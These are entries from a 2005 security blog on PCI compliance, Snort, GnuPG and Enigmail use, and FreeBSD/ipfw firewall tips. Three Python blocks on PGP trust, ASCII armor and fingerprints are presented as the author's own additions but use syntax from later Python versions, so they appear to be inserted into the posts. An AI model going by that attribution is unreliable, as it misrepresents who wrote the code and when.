I heard about this back in December, but it slipped off my radar. Now news outlets like The Register and News.com are reporting on the Payment Card Industry (PCI) Data Security Standard. Prior to standardization on the PCI, vendors had to juggle the Visa Cardholder Information Security Program (CISP), the MasterCard Site Data Protection Program, the American Express Data Security Operating Policy (DSOP), and the Discover Information Security and Compliance (DISC) document.

The PCI was publicized back in December when Visa released a memo (available in .pdf form here) letting vendors know what was happening.

The PCI standard consists of twelve requirements:

Build and Maintain a Secure Network
1. Install and maintain a firewall configuration to protect data
2. Do not use vendor-supplied defaults for system passwords and other security parameters

Protect Cardholder Data
3. Protect stored data
4. Encrypt transmission of cardholder data and sensitive information across public networks

Maintain a Vulnerability Management Program
5. Use and regularly update anti-virus software
6. Develop and maintain secure systems and applications

Implement Strong Access Control Measures
7. Restrict access to data by business need-to-know
8. Assign a unique ID to each person with computer access
9. Restrict physical access to cardholder data

Regularly Monitor and Test Networks
10. Track and monitor all access to network resources and cardholder data
11. Regularly test security systems and processes

Maintain an Information Security Policy
12. Maintain a policy that addresses information security

Visa's Cardholder Information Security Program page has the most browsable online content, but the Mastercard page has information as well.

Merchant e-Solutions summarizes PCI, with a note that level 2 (150,000 to 6,000,000 transactions per year) and level 3 (20,000 to 150,000 transactions per year) merchants require validation by a "Qualified Independent Scan Vendor" no later than June 30, 2005. Some documents also mention a "Qualified Independent Security Assessor." I've emailed Visa to find out how a vendor becomes "qualified," although one of my friends is already taking his security company through the process.

I think helping merchants meet these standards will usher a new wave of assessment business for security vendors. On a smaller scale, requirements to "Regularly Monitor and Test Networks" include intrusion detection and traffic audit components, so I look forward to participating in this process myself.

I noticed Foundstone offers a series of Webcasts on PCI and other standards. Regarding other standards, Application Security Inc. helpfully summarizes several of them in one place.

Update: I just got this email from Visa:

Thank you for your interest in the Visa CISP program. Visa is unable to qualify additional security assessors at this time. We are, however, currently considering opening the qualification program again to accept new security assessors. We will keep your information on file and respond if the program opens again. We will also make this information available on the website, so be sure to check back periodically.

Your company may certainly assist companies in meeting and maintaining compliance with the CISP requirements. Unfortunately, Visa is unable to review compliance solutions at this time.

MasterCard owns the scan vendor qualification program. You will need to contact MasterCard to apply for the program. https://sdp.mastercardintl.com/

Regards,
The CISP Team
http://www.visa.com/cisp

Update 2: Here is Visa's list of Qualified Independent Security Assessors in .pdf format. Here is Mastercard's list of Qualified Independent Scan Vendors. Mastercard explains their vendor certification process on that page, but they have not yet responded to the email I sent yesterday. Mastercard does provide a Web-based form to let candidate vendors begin the certification process.

Update 3: I got an email from Mastercard pointing me to the resources I outlined earlier. The sender said Mastercard charges $5,000 to become a Qualified Independent Scan Vendor. How can they possibly justify this cost? Unlike Visa, however, Mastercard is currently accepting new applicants to become Qualified Independent Scan Vendors.

Tuesday, April 26, 2005

Snort Developments

I have a few news items from the Snort world. First, Snort 2.3.3 was released. This should not have any new rules, as it's not Snort 2.4.0 or Snort 3.0.0. Snort 2.3.3 does feature a so-called "mini-preprocessor" to watch for attacks exploiting Vulnerability in Exchange Server Allows Remote Code Execution (MS05-021). Code to allegedly test for the vulnerability is here, so you might want to try testing Snort 2.3.3 with it.

Second, the Open Source Snort Rules Consortium ossrc-intro mailing list is operational. Currently the lead thread is asking for comments on the latest OSSRC Charter, dated 22 March 2005. This is the same document I previously examined.

Saturday, April 23, 2005

Sending Encrypted Email

In previous blog entries I've created GnuPG keys and decrypted a message encrypted with my public GnuPG key. In this entry I show how I respond with an encrypted email using Enigmail and how I encrypt a file using gpg at the command line.

You'll remember Bob sent me an encrypted email. I decided to send Bob an encrypted email in return. The first task was to find his public key. I used the key search feature. You may remember Bob included pgp.mit.edu in his signature as a hint for where to look for his public key, so I pass that site as the keyserver.

orr:/home/richard$ gpg --keyserver pgp.mit.edu
--search-keys rgrabowsky_at_rasecurity_dot_com
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
gpg: searching for "rgrabowsky_at_rasecurity_dot_com" from hkp server pgp.mit.edu
(1) Bob Grabowsky bob_at_infotech-nj_dot_com
Bob Grabowsky robertg_at_InfoTech-NJ_dot_com
Robert Grabowsky rgrabowsky_at_rasecurity_dot_com
Bob Grabowsky rgrabowsky_at_rasecuritysystems_dot_com
1024 bit DSA key 7932C9E3, created: 2001-05-27
Enter number(s), N)ext, or Q)uit > 1
gpg: requesting key 7932C9E3 from hkp server pgp.mit.edu
gpg: key 7932C9E3: public key "Robert Grabowsky " imported
gpg: Total number processed: 1
gpg: imported: 1

That was easy. Because I found the key and selected it, GnuPG imported it automatically. I can verify that.

orr:/home/richard$ gpg --list-keys
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
/home/richard/.gnupg/pubring.gpg
--------------------------------
pub 1024D/752B57C7 2005-04-23
uid Richard Bejtlich richard_at_taosecurity_dot_com
sub 2048g/8BA44991 2005-04-23

pub 1024D/7932C9E3 2001-05-27
uid Robert Grabowsky rgrabowsky_at_rasecurity_dot_com
uid Bob Grabowsky bob_at_infotech-nj_dot_com
uid Bob Grabowsky robertg_at_InfoTech-NJ_dot_com
uid Bob Grabowsky rgrabowsky_at_rasecuritysystems_dot_com
sub 1024g/8F0D6977 2001-05-27

Another alternative is to check a Web-based keyserver search form. I visited www.pgp.net/pgpnet/wwwkeys.html and searched on Bob's last name. Here are the pertinent results, with email addresses altered slightly to spoil harvesters.

pub 1024D/7932C9E3 2001-05-27 Bob Grabowsky bob_at_infotech-nj_dot_com
Bob Grabowsky robertg_at_InfoTech-NJ_dot_com
Robert Grabowsky rgrabowsky_at_rasecurity_dot_com
Bob Grabowsky rgrabowsky_at_rasecuritysystems_dot_com

Notice the key ID of 7932C9E3. This is the same value that appeared in Bob's signature in the message he sent to me. This must be the right public key. I've already imported the key with GnuPG, but if I wanted to use the key stored on this Web-based keyserver, I would download the key linked to these results. I would then use the import command.

So how did I respond to Bob's email? Enigmail made it easy. I decided to reply, and Enigmail asked if I wanted to configure Enigmail to import Bob's public key. In a second window I confirmed that I wanted Enigmail to use Bob's email address to locate his public key. When I selected 'send', I briefly saw my message in ASCII-armored format like this.

-----BEGIN PGP MESSAGE-----
Charset: ISO-8859-1
Version: GnuPG v1.4.0 (FreeBSD)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

hQEOAzf/9vKPDWl3EAQAqmMHJKxFtj1oN2NV0wUGvNmYTXvazSSiWg3iPzNix+n0
i5qajeTQ+v6PSlY5SvMwDaW6Ojp6MtsQ90O5IrrE1TBfSeDpO6EbQ2Vd0xhdGNtT
...truncated...

Then it was on its way, and it appeared in clear text in my Thunderbird window. Because I also asked Enigmail to sign the message for me, I saw a signature and key icons in the Thunderbird window indicating gpg had signed and encrypted my reply.

Earlier I mentioned importing a key from a file. As an example I import Bamm Visscher's public key, retrieved from the Web-accessible keyserver.

orr:/home/richard$ gpg --import bamm.asc
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
gpg: key 593C82C4: public key "Bamm Visscher (Senior
Engineer/Managed Security Services) rvisscher_at_saball_dot_com" imported
gpg: Total number processed: 1
gpg: imported: 1

Let's say I wanted to send an encrypted file to Bamm. The file is secret.txt. Here's how I would encrypt it. First I verify his user ID.

orr:/home/richard$ gpg --list-keys Bamm Visscher
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
pub 1024D/593C82C4 2001-06-26
uid Bamm Visscher (Senior Engineer/Managed Security Services)
rvisscher_at_saball_dot_com
sub 1024g/A3D3321B 2001-06-26

His UID is "Bamm Visscher". Now I encrypt secret.txt.

orr:/home/richard$ gpg -sear "Bamm Visscher" secret.txt
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

You need a passphrase to unlock the secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
1024-bit DSA key, ID 752B57C7, created 2005-04-23

gpg: A3D3321B: There is no assurance this key belongs to the named user

pub 1024g/A3D3321B 2001-06-26 Bamm Visscher
(Senior Engineer/Managed Security Services) rvisscher_at_saball_dot_com
Primary key fingerprint: 7FA4 8692 4707 D567 E0D7 5835 416C 0915 593C 82C4
Subkey fingerprint: 4282 C306 F28B C630 8057 50EC E3E1 FEE5 A3D3 321B

It is NOT certain that the key belongs to the person named
in the user ID. If you *really* know what you are doing,
you may answer the next question with yes.

Use this key anyway? (y/N) y

The 's' switch signs the file. The 'e' switch specifies encryption. The 'a' switch tells gpg to create an ASCII-armored file suitable for transport via email text. The 'r' switch says a UID follows, e.g. "Bamm Visscher".

You'll notice gpg complained that it couldn't be sure Bamm's public key belonged to him. This is where the key fingerprint and a call to Bamm come into play. If I wanted to verify the authenticity of Bamm's public key, I would call him and ask him to tell me his fingerprint. Since it matches the value posted above, I know he is the owner of this public key. When I trust his key, then I can sign it with my own as follows.

orr:/home/richard$ gpg --sign-key A3D3321B
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

pub 1024D/593C82C4 created: 2001-06-26 expires: never usage: CSA
trust: unknown validity: unknown
sub 1024g/A3D3321B created: 2001-06-26 expires: never usage: E
[ unknown] (1). Bamm Visscher (Senior Engineer/Managed Security Services)


pub 1024D/593C82C4 created: 2001-06-26 expires: never usage: CSA
trust: unknown validity: unknown
Primary key fingerprint: 7FA4 8692 4707 D567 E0D7 5835 416C 0915 593C 82C4

Bamm Visscher (Senior Engineer/Managed Security Services)
rvisscher_at_saball_dot_com

Are you sure that you want to sign this key with your
key "Richard Bejtlich richard_at_taosecurity_dot_com" (752B57C7)

Really sign? (y/N) y

You need a passphrase to unlock the secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
1024-bit DSA key, ID 752B57C7, created 2005-04-23

Let's say I now want to send Bamm secret2.txt in encrypted form. Does gpg complain after I've signed Bamm's public key?

orr:/home/richard$ gpg -sear "Bamm Visscher" secret2.txt
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

You need a passphrase to unlock the secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
1024-bit DSA key, ID 752B57C7, created 2005-04-23

gpg: checking the trustdb
gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model
gpg: depth: 0 valid: 1 signed: 1 trust: 0-, 0q, 0n, 0m, 0f, 1u
gpg: depth: 1 valid: 1 signed: 0 trust: 1-, 0q, 0n, 0m, 0f, 0u

No problems. If I wanted to upload this signed key to a keyserver, I could use this syntax.

gpg --keyserver [keyserver] --send-key [Key_ID]
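
The "3 marginal(s) needed, 1 complete(s) needed, PGP trust model" and "depth:" lines above are gpg reporting how it decided which keys are valid. As an added illustration (my own code, not GnuPG's), here is a simplified Python implementation of that classic trust model: a key becomes fully valid when it carries a certification from one fully or ultimately trusted valid key, or from three marginally trusted valid keys, within the maximum certification depth. It ignores expiry, revocation, certification levels and trust signatures, which real gpg also checks.

```python
from collections import defaultdict

ULTIMATE, FULL, MARGINAL, UNKNOWN = "ultimate", "full", "marginal", "unknown"


def compute_validity(ownertrust, signatures, marginals_needed=3, completes_needed=1,
                     max_cert_depth=5):
    """Classic PGP trust model, roughly as gpg's 'checking the trustdb' pass applies it.

    ownertrust: {key_id: ULTIMATE | FULL | MARGINAL | UNKNOWN}, i.e. how far you trust
                the key's owner to certify other people's keys (gpg --edit-key ... trust).
    signatures: iterable of (signer_key_id, signed_key_id) certifications.
    Returns (validity, per_depth): validity maps key_id -> FULL / MARGINAL / UNKNOWN,
    and per_depth[d] is how many keys became fully valid at depth d, which is what the
    'depth: d valid: N' lines count.
    """
    validity = {k: UNKNOWN for k in ownertrust}
    certs_on = defaultdict(set)
    for signer, signee in signatures:
        if signer != signee:
            certs_on[signee].add(signer)

    # Depth 0: your own ultimately trusted keys are valid by definition.
    vouchers = {k for k, t in ownertrust.items() if t == ULTIMATE}
    for k in vouchers:
        validity[k] = FULL
    per_depth = [len(vouchers)]

    for _depth in range(1, max_cert_depth + 1):
        newly_full = set()
        for key in ownertrust:
            if validity[key] == FULL:
                continue
            completes = marginals = 0
            for signer in certs_on[key] & vouchers:
                if ownertrust[signer] in (ULTIMATE, FULL):
                    completes += 1
                elif ownertrust[signer] == MARGINAL:
                    marginals += 1
            if completes >= completes_needed or marginals >= marginals_needed:
                validity[key] = FULL
                newly_full.add(key)
            elif completes or marginals:
                validity[key] = MARGINAL   # some vouching, but below the threshold
        if not newly_full:
            break
        per_depth.append(len(newly_full))
        # Only keys that are fully valid AND whose owner you trust vouch for others.
        vouchers |= {k for k in newly_full if ownertrust[k] in (ULTIMATE, FULL, MARGINAL)}
    return validity, per_depth


if __name__ == "__main__":
    # The situation in this entry: my ultimately trusted key has signed Bamm's key.
    validity, per_depth = compute_validity(
        {"752B57C7": ULTIMATE, "593C82C4": UNKNOWN}, [("752B57C7", "593C82C4")])
    for depth, count in enumerate(per_depth):
        print(f"depth: {depth} valid: {count}")
    print(validity)
```

With the keys from this entry the function reports one valid key at depth 0 (mine) and one at depth 1 (Bamm's), matching the two "depth:" lines gpg printed. The practical point is the vouching rule: a key you have not marked as trusted, even once it is valid, does not help validate anyone else's key.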

I wrote these three blog entries to document how I got GnuPG running and working with Thunderbird. There are many GnuPG tutorials and documents online, and I recommend referencing them for more information. Thanks to Bob for sending a test message.

Decrypting Encrypted Email

No sooner had I posted my last entry on creating a GnuPG key than a visitor sent me an encrypted email. My mail client is Thunderbird, and it promptly put a message from Robert Grabowsky into my Junk folder. Thunderbird suspected the message was spam! It looked like this. Certain fields have been edited to foil email address harvesting:

Date: Sat, 23 Apr 2005 17:26:37 -0400 (EDT)
From: Robert Grabowsky rgrabowsky_at_rasecurity_dot_com
To: Richard Bejtlich richard_at_taosecurit_dot_com
Subject: test of your key

-----BEGIN PGP MESSAGE-----

hQIOA+vNZOSLpEmREAf/XTL0KqQAnwOIkONZGgZMsyEFD00O7O8qzNRmv7A/IVwg
o95VmxSoUXDIwNtQG1QpSbTY217k/HmUEKup0n2laON49SGKj1H76SwS0BVNG8Xj
...edited...
ADc/eiJOmnZuhDhTYMJoqziAilKf9Y7ChHKKjtil2WTrnNL3qfwX5636Sb3sjFMg
f1Q+WCHWMr9LOQG3JGmGfjNZe6iMzp+Wl5y7m/j+7HMwiVp+J2sHyx1pffnGtFgP
=Xa7M
-----END PGP MESSAGE-----

To manually decrypt this message, I saved the message body into a file called msg.txt. Then I used gpg to decrypt it.

orr:/home/richard$ gpg -d msg.txt
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

You need a passphrase to unlock the secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
2048-bit ELG-E key, ID 8BA44991, created 2005-04-23 (main key ID 752B57C7)

gpg: encrypted with 2048-bit ELG-E key, ID 8BA44991, created 2005-04-23
"Richard Bejtlich richard_at_taosecurity_dot_com"
Hi Richard,

Here's a quick test of your GnuPG key. Keep of the great work on the
blog, I check it every day!!!

Best Regards,
Bob

Robert Grabowsky, CISSP | Ra Security Systems, Inc.
rgrabowsky_at_rasecurity_dot_com | GPG KeyID 0x7932C9E3 (pgp.mit.edu)
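
The "-----BEGIN PGP MESSAGE-----" blocks above (here and in the Sending Encrypted Email entry) are OpenPGP ASCII armor: the binary message in base64, with optional header lines and a CRC-24 trailer like "=Xa7M" that lets a recipient notice truncation or corruption before decryption is attempted. As an added example (my own code, not GnuPG's or Enigmail's), here is a small Python armor encoder and decoder; gpg does the same job internally when you run gpg -a or gpg -d, and a real message body would of course be an encrypted packet rather than the plain text used here.

```python
import base64
import re

# CRC-24 parameters from RFC 4880 section 6.1 (the "Radix-64" checksum).
CRC24_INIT = 0xB704CE
CRC24_POLY = 0x1864CFB


def crc24(data: bytes) -> int:
    """CRC-24 over the decoded (binary) payload."""
    crc = CRC24_INIT
    for byte in data:
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= CRC24_POLY
    return crc & 0xFFFFFF


def crc_line(payload: bytes) -> str:
    """The '=XXXX' trailer: base64 of the three-byte CRC-24 of the payload."""
    return "=" + base64.b64encode(crc24(payload).to_bytes(3, "big")).decode("ascii")


def armor(payload: bytes, headers=None, block_type="PGP MESSAGE", width=64) -> str:
    """Wrap binary data in ASCII armor with the given header lines."""
    body = base64.b64encode(payload).decode("ascii")
    lines = [f"-----BEGIN {block_type}-----"]
    lines += [f"{k}: {v}" for k, v in (headers or {}).items()]
    lines.append("")  # a blank line separates armor headers from the body
    lines += [body[i:i + width] for i in range(0, len(body), width)]
    lines.append(crc_line(payload))
    lines.append(f"-----END {block_type}-----")
    return "\n".join(lines) + "\n"


BEGIN_RE = re.compile(r"^-----BEGIN ([A-Z ]+)-----$")


def dearmor(text: str):
    """Return (block_type, headers, payload); raise ValueError on bad armor or CRC.

    Text before the BEGIN line (for example mail headers) is skipped, so the raw
    body saved from a mail client, like msg.txt above, can be passed in as-is.
    """
    lines = [l.rstrip("\r") for l in text.split("\n")]
    i = 0
    while i < len(lines) and not BEGIN_RE.match(lines[i].strip()):
        i += 1
    if i == len(lines):
        raise ValueError("no BEGIN line found")
    block_type = BEGIN_RE.match(lines[i].strip()).group(1)
    i += 1
    headers = {}
    while i < len(lines) and lines[i].strip():
        key, sep, value = lines[i].partition(":")
        if not sep:
            raise ValueError(f"malformed armor header: {lines[i]!r}")
        headers[key.strip()] = value.strip()
        i += 1
    i += 1  # skip the blank separator line
    end_marker = f"-----END {block_type}-----"
    body, crc_text = [], None
    while i < len(lines) and lines[i].strip() != end_marker:
        line = lines[i].strip()
        if line.startswith("="):
            crc_text = line[1:]
        elif line:
            body.append(line)
        i += 1
    if i == len(lines):
        raise ValueError("no END line found")
    payload = base64.b64decode("".join(body), validate=True)
    if crc_text is not None:
        expected = int.from_bytes(base64.b64decode(crc_text, validate=True), "big")
        if expected != crc24(payload):
            raise ValueError("CRC-24 mismatch: armor was altered or truncated")
    return block_type, headers, payload


def armor_is_intact(text: str) -> bool:
    """True if the armor parses and its CRC-24 matches the decoded body."""
    try:
        dearmor(text)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    sample = armor(b"Hi Richard,\n", {"Version": "GnuPG v1.4.0 (FreeBSD)"})
    print(sample)
    print(dearmor("Subject: test of your key\n\n" + sample))
```

The checksum is an integrity hint, not a security control: it catches a mangled paste or a message cut off by a mail gateway, but anyone who can alter the armor can recompute it. Authenticity comes from the signature gpg verifies after decryption, which is why Enigmail shows the separate signature icon.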

An excellent alternative to manual decryption is Enigmail, a plug-in for Thunderbird and the Mozilla client. I installed the mail/enigmail-thunderbird FreeBSD package and then fired up Thunderbird. I had a new menu item called "Enigmail". When I highlighted Bob's message, Enigmail began a simple setup procedure.

It asked me to enter my private GnuPG passphrase, then it wanted to know where the gpg binary resided. I entered /usr/local/bin/gpg. With that, the message was decrypted automatically. Now when I see the message within Thunderbird, it appears as clear text.

Now I needed to send a reply. I will enter that in a future blog posting shortly.

Simple GnuPG Key Creation

I was recently asked to provide my GnuPG public key to facilitate sharing encrypted documents. I realized I needed to set up a public key with my richard at taosecurity dot com mailing address. Here's how I did it. First I installed the FreeBSD security/gnupg-devel package. Then I was ready to begin. I started by creating my key. Where necessary I've modified my email address in the listing below to spoil simple harvesting methods.

orr:/home/richard$ gpg --gen-key
gpg (GnuPG) 1.4.0; Copyright (C) 2004 Free Software Foundation, Inc.
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions. See the file COPYING for details.

gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
gpg: directory `/home/richard/.gnupg' created
gpg: new configuration file `/home/richard/.gnupg/gpg.conf' created
gpg: WARNING: options in `/home/richard/.gnupg/gpg.conf' are not yet active during this run
gpg: keyring `/home/richard/.gnupg/secring.gpg' created
gpg: keyring `/home/richard/.gnupg/pubring.gpg' created
Please select what kind of key you want:
(1) DSA and Elgamal (default)
(2) DSA (sign only)
(5) RSA (sign only)
Your selection? 1
DSA keypair will have 1024 bits.
ELG-E keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048)
Requested keysize is 2048 bits
Please specify how long the key should be valid.
0 = key does not expire
<n> = key expires in n days
<n>w = key expires in n weeks
<n>m = key expires in n months
<n>y = key expires in n years
Key is valid for? (0) 0
Key does not expire at all
Is this correct? (y/N) y

You need a user ID to identify your key; the software constructs the user ID
from the Real Name, Comment and Email Address in this form:
"Heinrich Heine (Der Dichter) <heinrichh@duesseldorf.de>"

Real name: Richard Bejtlich
Email address: richard_at_taosecurity_dot_com
Comment:
You selected this USER-ID:
"Richard Bejtlich richard_at_taosecurity_dot_com"

Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? o
You need a Passphrase to protect your secret key.

Enter passphrase:

Repeat passphrase:

We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
++++++++++.
gpg: /home/richard/.gnupg/trustdb.gpg: trustdb created
gpg: key 752B57C7 marked as ultimately trusted
public and secret key created and signed.

gpg: checking the trustdb
gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model
gpg: depth: 0 valid: 1 signed: 0 trust: 0-, 0q, 0n, 0m, 0f, 1u
pub 1024D/752B57C7 2005-04-23
Key fingerprint = 2B43 9A2E 6925 D581 5E34 FD6B 020C E655 752B 57C7
uid Richard Bejtlich richard_at_taosecurity_dot_com
sub 2048g/8BA44991 2005-04-23

That's it. I then listed my keys.

orr:/home/richard$ gpg --list-keys
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
/home/richard/.gnupg/pubring.gpg
--------------------------------
pub 1024D/752B57C7 2005-04-23
uid Richard Bejtlich richard_at_taosecurity_dot_com
sub 2048g/8BA44991 2005-04-23

orr:/home/richard$ gpg --list-secret-keys
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
/home/richard/.gnupg/secring.gpg
--------------------------------
sec 1024D/752B57C7 2005-04-23
uid Richard Bejtlich richard_at_taosecurity_dot_com
ssb 2048g/8BA44991 2005-04-23

Here's how to see the key fingerprint. The fingerprint is a way to describe my key in shorthand form.

orr:/home/richard$ gpg --fingerprint
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
/home/richard/.gnupg/pubring.gpg
--------------------------------
pub 1024D/752B57C7 2005-04-23
Key fingerprint = 2B43 9A2E 6925 D581 5E34 FD6B 020C E655 752B 57C7
uid Richard Bejtlich richard_at_taosecurity_dot_com
sub 2048g/8BA44991 2005-04-23

To make my public key available in ASCII form, I exported it to a file.

orr:/home/richard$ gpg --export --armor richard_at_taosecurity_dot_com
> richard_at_taosecurity_dot_com.key.gpg.asc
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

You can access my public key here.

Now I wanted to create a revocation certificate, to assist me in removing my public key from a keyserver should my private key ever be compromised.

orr:/home/richard$ gpg --gen-revoke richard_at_taosecurity_dot_com >
richard_at_taosecurity_dot_com.com.revoke.gpg.asc
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

sec 1024D/752B57C7 2005-04-23 Richard Bejtlich richard_at_taosecurity_dot_com

Create a revocation certificate for this key? (y/N) y
Please select the reason for the revocation:
0 = No reason specified
1 = Key has been compromised
2 = Key is superseded
3 = Key is no longer used
Q = Cancel
(Probably you want to select 1 here)
Your decision? 0
Enter an optional description; end it with an empty line:
Revoke

Reason for revocation: No reason specified
Revoke
Is this okay? (y/N) y

You need a passphrase to unlock the secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
1024-bit DSA key, ID 752B57C7, created 2005-04-23

Enter passphrase:

ASCII armored output forced.
Revocation certificate created.

Please move it to a medium which you can hide away; if Mallory gets
access to this certificate he can use it to make your key unusable.
It is smart to print this certificate and store it away, just in case
your media become unreadable. But have some caution: The print system of
your machine might store the data and make it available to others!
orr:/home/richard$ chmod 400 richard_at_taosecurity_dot_com.revoke.gpg.asc

Finally, I wanted to make this new public key available on public keyservers. I have to specify my public key ID 752B57C7, which is seen in the --list-keys output above and is also the last eight characters of my key fingerprint.

orr:/home/richard$ gpg --send-keys 752B57C7
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
gpg: sending key 752B57C7 to hkp server subkeys.pgp.net
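
Since the fingerprint and the key ID come up repeatedly above (gpg --fingerprint, and the point that 752B57C7 is the last eight characters of the fingerprint), here is an added Python example, my own code rather than GnuPG's, that computes a version 4 OpenPGP fingerprint the way RFC 4880 specifies it: SHA-1 over a 0x99 byte, the two-byte length of the public-key packet body, and the body itself. The DSA parameters used are constructed toy values far too small for a real key; they only exercise the packet layout.

```python
import hashlib
import struct


def mpi(n: int) -> bytes:
    """OpenPGP multiprecision integer: two-byte bit count, then big-endian magnitude."""
    if n < 0:
        raise ValueError("MPIs are unsigned")
    magnitude = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    return struct.pack(">H", n.bit_length()) + magnitude


def dsa_public_key_body(created: int, p: int, q: int, g: int, y: int) -> bytes:
    """Body of a version 4 public-key packet for algorithm 17 (DSA), RFC 4880 5.5.2."""
    return b"\x04" + struct.pack(">I", created) + b"\x11" + mpi(p) + mpi(q) + mpi(g) + mpi(y)


def v4_fingerprint(key_body: bytes) -> str:
    """SHA-1 over 0x99 || two-byte body length || body (RFC 4880 12.2), as 40 hex digits."""
    prefix = b"\x99" + struct.pack(">H", len(key_body))
    return hashlib.sha1(prefix + key_body).hexdigest().upper()


def long_key_id(fingerprint: str) -> str:
    return fingerprint[-16:]   # low 64 bits of the fingerprint


def short_key_id(fingerprint: str) -> str:
    return fingerprint[-8:]    # low 32 bits: the '752B57C7' style ID gpg prints


def pretty_fingerprint(fingerprint: str) -> str:
    """Group the hex digits in fours, as 'gpg --fingerprint' displays them."""
    return " ".join(fingerprint[i:i + 4] for i in range(0, len(fingerprint), 4))


# Constructed toy DSA parameters (NOT a usable key; only the packet layout matters here).
TOY_CREATED = 1114214400
TOY_P, TOY_Q, TOY_G, TOY_Y = 0xDEADBEEF, 0xCAFE, 0x1234, 0xABCDEF


def describe_toy_key():
    """Fingerprint and derived IDs of the constructed toy key."""
    fp = v4_fingerprint(dsa_public_key_body(TOY_CREATED, TOY_P, TOY_Q, TOY_G, TOY_Y))
    return {"fingerprint": pretty_fingerprint(fp),
            "long_id": long_key_id(fp),
            "short_id": short_key_id(fp)}


if __name__ == "__main__":
    for k, v in describe_toy_key().items():
        print(f"{k}: {v}")
```

Two things follow from the construction. The creation time is part of the hashed body, so the same DSA numbers created one second apart give different fingerprints. And the short ID is only 32 bits of the 160-bit hash, so when verifying a key over the phone, as described in the Sending Encrypted Email entry, read the whole fingerprint rather than the eight-character ID.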

I also submitted my public key to www.keyserver.net, which has a Web-accessible search form. By default GnuPG sent my key to subkeys.pgp.net, which has no Web page of its own. To search the pgp.net keyservers, visit www.pgp.net/pgpnet/wwwkeys.html.

If someone cares to send me a message encrypted with my public key, a future blog entry will show how to decrypt it.

Thursday, April 21, 2005

ZDNet BSD Certification Coverage and More

Joe Brockmeier published an interview with Dru Lavigne, chair of the BSD Certification Group. I'm a member of that organization and I will be present at the BSDCan 2005 BoFs to discuss BSD certification with any interested parties. Dru's interview provides additional background on our progress towards creating respected, valuable BSD certifications.

Most importantly, today our Task Analysis Survey is publicly available. This is a Web-based questionnaire that we hope BSD users like you will complete. Our goal is to learn what BSD users and administrators consider to be the essential administration tasks for BSD systems. Please help us out by completing the survey no later than midnight GMT 22 May 2005. Thank you!

Wednesday, April 20, 2005

Todd Lammle Teaches CCNA in Denver in June

You may have followed my recent journey towards passing the CCNA exam. My instructor Todd Lammle just told me he will be teaching another CCNA class in Denver, from 13 to 17 June. This is a rare event as Todd runs the training company GlobalNet Training and stays very busy.

Todd is the author of the best-selling CCNA: Cisco Certified Network Associate, Deluxe Edition (640-801), 4th Ed which helped immensely. I highly recommend attending this class if you want to pass your CCNA. If you decide to go, please email me at taosecurity at gmail dot com. I would like to hear what you think of the class.

Cross-platform Pf Guide

While the official OpenBSD Pf guide is very good, I recommend those wishing to learn more about the Pf firewall check out Peter N. M. Hansteen's Firewalling with Pf guide. I like this document because it shows how to get Pf working on OpenBSD, FreeBSD, and NetBSD. Peter also covers the most common deployment scenarios and he addresses topics I consider important. Check it out if you're considering a Pf-based firewall solution.

FreeBSD News

I have some good FreeBSD news to report. FreeBSD 5.4-RC3 was announced Monday. Although the schedule still calls for a 26 April release date, I believe we will not see the RELEASE until the first week in May. According to the announcement:

"Due to one major issue that crops up on large (4-processor) systems under heavy load that is still being debugged there will be at least one more RC added to the schedule. Timing for the extra RC and the new Release date have not been set yet."

I am hoping that FreeBSD 5.4 will be the release that convinces 4.x users to upgrade. I have not had any problems running FreeBSD 5.3 since it arrived last November, but others are more cautious.

There's an interesting freebsd-stable thread with several hints on updating systems. This post by Aristedes Maniatis recommends using the following command to preserve access to a system when you accidentally lock yourself out while modifying firewall rules.

echo "ipfw add 1 pass all from any to any" | at now + 10 minutes

He continues with "Then if all goes OK, use atq to remove the queue item. If not, wait 10 minutes..."

That is great advice. I have heard of "people" locking themselves out of systems while modifying firewall rules.

David Talkington offered an alternative method to avoid lockout -- using IPFW's set 31 feature. From the manual:

set set_number
Each rule is associated with a set_number in the range 0..31.
Sets can be individually disabled and enabled, so this parameter
is of fundamental importance for atomic ruleset manipulation. It
can be also used to simplify deletion of groups of rules.
If a rule is entered without specifying a set number, set 0
will be used.
Set 31 is special in that it cannot be disabled, and rules in set
31 are not deleted by the ipfw flush command (but you can delete
them with the ipfw delete set 31 command). Set 31 is also used
for the default rule.

Here is how a normal IPFW rule (numbered 5000) is added, say to disable ICMP.

drury:/root# ipfw add 5000 deny icmp from any to any
